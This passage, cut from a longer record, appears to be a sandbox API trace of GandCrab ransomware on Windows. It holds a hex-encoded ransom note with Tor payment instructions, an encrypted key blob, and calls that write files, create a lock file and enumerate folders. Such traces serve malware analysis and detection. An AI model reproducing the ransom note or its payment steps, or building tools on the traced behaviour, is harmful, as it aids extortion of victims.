x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0079.121] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0079.121] CloseHandle (hObject=0x2d4) returned 1 [0079.122] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.122] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.122] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x18, wMilliseconds=0x1b4)) [0079.122] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.122] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0079.122] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.123] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\d2ca4a09d2ca4deb61a.lock") returned 102 [0079.123] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0079.125] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.125] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.125] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\") returned 78 [0079.125] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*" [0079.125] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x503278 [0079.125] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.125] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0079.126] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.126] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.126] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0079.126] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0079.126] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0079.126] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\d2ca4a09d2ca4deb61a.lock" [0079.126] lstrlenW (lpString=".titwmvjl") returned 9 [0079.126] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\d2ca4a09d2ca4deb61a.lock") returned 102 [0079.126] VirtualAlloc (lpAddress=0x0, dwSize=0x10c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.126] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: 